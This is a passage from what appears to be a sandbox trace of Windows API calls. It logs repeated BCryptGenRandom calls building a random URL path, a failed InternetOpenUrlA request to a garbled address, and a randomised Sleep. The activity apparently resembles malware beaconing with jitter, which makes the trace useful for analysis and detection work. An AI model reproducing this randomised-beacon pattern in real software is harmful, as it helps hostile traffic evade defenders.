pbBuffer=0x46ffd5f) returned 0x0 [0235.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0235.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0235.892] GetProcessHeap () returned 0x440000 [0235.892] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0235.892] lstrcpyA (in: lpString1=0x473140, lpString2="P²¡\x03" | out: lpString1="P²¡\x03") returned="P²¡\x03" [0235.892] lstrcatA (in: lpString1="P²¡\x03", lpString2="/0fzmg4ogq4camDhdmp1hlvcvamm2ecGdi9NK/PEwt9w0OuXus14xtHpuXsSjsuy5htd98jy5u6kg19j/" | out: lpString1="P²¡\x03/0fzmg4ogq4camDhdmp1hlvcvamm2ecGdi9NK/PEwt9w0OuXus14xtHpuXsSjsuy5htd98jy5u6kg19j/") returned="P²¡\x03/0fzmg4ogq4camDhdmp1hlvcvamm2ecGdi9NK/PEwt9w0OuXus14xtHpuXsSjsuy5htd98jy5u6kg19j/" [0235.893] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0235.893] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P²¡\x03/0fzmg4ogq4camDhdmp1hlvcvamm2ecGdi9NK/PEwt9w0OuXus14xtHpuXsSjsuy5htd98jy5u6kg19j/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0235.893] GetProcessHeap () returned 0x440000 [0235.893] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0235.893] GetProcessHeap () returned 0x440000 [0235.893] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0235.893] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0235.893] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0235.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0235.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0235.894] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0235.894] Sleep (dwMilliseconds=0x17f66) [0236.173] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.173] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0236.174] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0236.174] GetProcessHeap () returned 0x440000 [0236.174] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a16800 [0236.174] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0236.174] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16801, cbBuffer=0x25, dwFlags=0x2 | out: pbBuffer=0x3a16801) returned 0x0 [0236.175] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.175] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.176] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.176] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.176] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.177] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.177] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.177] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.177] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.177] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.177] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.177] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.178] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.178] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.178] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.178] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.179] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.179] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.179] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.179] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.180] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.481] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.482] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.482] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.483] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.483] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.483] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.483] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0236.484] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.484] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.484] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.485] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.485] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.485] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.485] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.485] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.485] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.486] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0236.486] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16826, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a16826) returned 0x0 [0236.486] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.486] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.487] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.487] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.487] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.487] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.487] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.487] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.488] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.488] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.488] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.488] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.489] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.489] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.489] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.489] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.489] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.489] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.489] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.489] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.490] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.490] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.490] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.491] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.491] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.491] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.492] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.492] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.492] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.492] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.492] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.492] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.493] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.493] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.493] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.493] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.493] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.493] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.494] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.494] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.494] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.494] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.495] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.495] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0236.495] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1684e, cbBuffer=0x29, dwFlags=0x2 | out: pbBuffer=0x3a1684e) returned 0x0 [0236.495] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 